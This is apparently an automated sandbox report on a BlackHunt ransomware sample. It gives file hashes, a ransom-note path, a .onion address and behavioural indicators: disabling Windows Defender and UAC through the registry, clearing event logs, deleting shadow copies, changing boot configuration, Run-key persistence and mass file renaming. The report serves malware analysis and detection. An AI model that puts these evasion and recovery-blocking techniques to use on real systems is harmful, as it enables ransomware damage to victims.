Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:18
Static task
static1
Behavioral task
behavioral1
Sample
9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
Resource
win10v2004-20231215-en
General
-
Target
9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe
-
Size
707KB
-
MD5
107d5484b3d34e5560406e214e6c1d0e
-
SHA1
939d1b225cbb7ec7ca8c739d1b6f4f49032e1774
-
SHA256
9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a
-
SHA512
8c0e52726bb77a7ca34c1a6bffbfce769c1d40c8154f0d2e51ac9fab76b8e166fba0c431da42114ed9f781742efa2e7786e31f245a47df7e07daff69d8867c2c
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158ivnh:6uaTmkZJ+naie5OTamgEoKxLWcsh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2464 fsutil.exe 2860 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2772 wevtutil.exe 1308 wevtutil.exe 3964 wevtutil.exe 3240 wevtutil.exe 668 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3640 bcdedit.exe 1112 bcdedit.exe 1952 bcdedit.exe 3680 bcdedit.exe -
Renames multiple (2917) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2708 wbadmin.exe 3744 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3700 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\S: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\Z: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\T: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\V: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\Q: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\J: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\X: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\I: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\P: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\U: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\O: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\H: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\B: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\N: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\M: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\R: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\A: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\G: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\K: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\L: 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Efate 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Whitehorse 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground.wmv 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\#BlackHunt_Private.key 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.txt 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\#BlackHunt_ReadMe.hta 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_ButtonGraphic.png 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.lock 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files\StopEnable.contact 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2136 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1512 vssadmin.exe 2676 vssadmin.exe 2840 vssadmin.exe 2276 vssadmin.exe 3584 vssadmin.exe 1832 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1804 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2424 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1724 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeRestorePrivilege 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeBackupPrivilege 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeTakeOwnershipPrivilege 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeAuditPrivilege 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeSecurityPrivilege 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeIncBasePriorityPrivilege 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe Token: SeBackupPrivilege 3720 vssvc.exe Token: SeRestorePrivilege 3720 vssvc.exe Token: SeAuditPrivilege 3720 vssvc.exe Token: SeBackupPrivilege 1732 wbengine.exe Token: SeRestorePrivilege 1732 wbengine.exe Token: SeSecurityPrivilege 1732 wbengine.exe Token: SeSecurityPrivilege 3964 wevtutil.exe Token: SeBackupPrivilege 3964 wevtutil.exe Token: SeSecurityPrivilege 3240 wevtutil.exe Token: SeSecurityPrivilege 1308 wevtutil.exe Token: SeSecurityPrivilege 668 wevtutil.exe Token: SeBackupPrivilege 3240 wevtutil.exe Token: SeBackupPrivilege 1308 wevtutil.exe Token: SeBackupPrivilege 668 wevtutil.exe Token: SeSecurityPrivilege 2772 wevtutil.exe Token: SeBackupPrivilege 2772 wevtutil.exe Token: SeDebugPrivilege 1804 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2224 wrote to memory of 1768 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 31 PID 2224 wrote to memory of 1768 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 31 PID 2224 wrote to memory of 1768 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 31 PID 2224 wrote to memory of 1768 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 31 PID 2224 wrote to memory of 2544 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 29 PID 2224 wrote to memory of 2544 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 29 PID 2224 wrote to memory of 2544 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 29 PID 2224 wrote to memory of 2544 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 29 PID 2224 wrote to memory of 2728 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 33 PID 2224 wrote to memory of 2728 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 33 PID 2224 wrote to memory of 2728 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 33 PID 2224 wrote to memory of 2728 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 33 PID 1768 wrote to memory of 2556 1768 cmd.exe 35 PID 1768 wrote to memory of 2556 1768 cmd.exe 35 PID 1768 wrote to memory of 2556 1768 cmd.exe 35 PID 2224 wrote to memory of 2572 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 36 PID 2224 wrote to memory of 2572 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 36 PID 2224 wrote to memory of 2572 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 36 PID 2224 wrote to memory of 2572 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 36 PID 2544 wrote to memory of 2612 2544 cmd.exe 38 PID 2544 wrote to memory of 2612 2544 cmd.exe 38 PID 2544 wrote to memory of 2612 2544 cmd.exe 38 PID 2224 wrote to memory of 2652 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 39 PID 2224 wrote to memory of 2652 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 39 PID 2224 wrote to memory of 2652 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 39 PID 2224 wrote to memory of 2652 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 39 PID 2224 wrote to memory of 2688 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 40 PID 2224 wrote to memory of 2688 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 40 PID 2224 wrote to memory of 2688 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 40 PID 2224 wrote to memory of 2688 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 40 PID 2224 wrote to memory of 2568 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 43 PID 2224 wrote to memory of 2568 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 43 PID 2224 wrote to memory of 2568 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 43 PID 2224 wrote to memory of 2568 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 43 PID 2224 wrote to memory of 2588 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 44 PID 2224 wrote to memory of 2588 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 44 PID 2224 wrote to memory of 2588 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 44 PID 2224 wrote to memory of 2588 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 44 PID 2728 wrote to memory of 2720 2728 cmd.exe 46 PID 2728 wrote to memory of 2720 2728 cmd.exe 46 PID 2728 wrote to memory of 2720 2728 cmd.exe 46 PID 2224 wrote to memory of 2596 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 47 PID 2224 wrote to memory of 2596 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 47 PID 2224 wrote to memory of 2596 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 47 PID 2224 wrote to memory of 2596 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 47 PID 2224 wrote to memory of 2680 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 48 PID 2224 wrote to memory of 2680 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 48 PID 2224 wrote to memory of 2680 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 48 PID 2224 wrote to memory of 2680 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 48 PID 2224 wrote to memory of 2836 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 50 PID 2224 wrote to memory of 2836 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 50 PID 2224 wrote to memory of 2836 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 50 PID 2224 wrote to memory of 2836 2224 9c83407f76af3f841b99a6fa8cf7cb87ba998628f4bdb72cab0155fa2599145a.exe 50 PID 2572 wrote to memory of 2580 2572 cmd.exe 132 PID 2572 wrote to memory of 2580 2572 cmd.exe 132 PID 2572 wrote to memory of 2580 2572 